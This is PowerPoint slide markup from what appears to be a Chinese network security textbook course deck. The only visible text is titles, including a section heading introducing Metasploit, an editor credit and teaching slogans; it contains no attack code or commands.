          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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图片 7" descr="V-136038-F72FEC97O"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="10000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="159385" y="-137795"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="D:\用户目录\Desktop\223.png223"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216535" y="1415415"/>
            <a:ext cx="6368415" cy="4027805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5576570" y="1704340"/>
            <a:ext cx="4876800" cy="1009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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="dist">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="007BD3"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="034373"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin scaled="0"/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网络安全技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="007BD3"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="034373"/>
                  </a:gs>
                </a:gsLst>
                <a:lin scaled="0"/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5634990" y="2847975"/>
            <a:ext cx="4752340" cy="3810"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="451485"/>
            <a:ext cx="4021455" cy="301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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>广东省首批十四五规划教材</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624705" y="5731510"/>
            <a:ext cx="2943225" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6736715" y="4239895"/>
            <a:ext cx="2548255" cy="56007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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主编：张燕燕</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5238115" y="3315970"/>
            <a:ext cx="5756910" cy="3219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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>课程思政</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>岗课赛证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目式教学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务驱动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="蝴蝶结"/>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2184400" y="1409700"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="茶杯"/>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3098800" y="1409700"/>
            <a:ext cx="296545" cy="296545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="衣架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId13"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4013200" y="1409700"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="新建文档"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId15"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="1791335"/>
            <a:ext cx="491490" cy="491490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId17"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459355" y="3238500"/>
            <a:ext cx="492760" cy="492760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId19"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
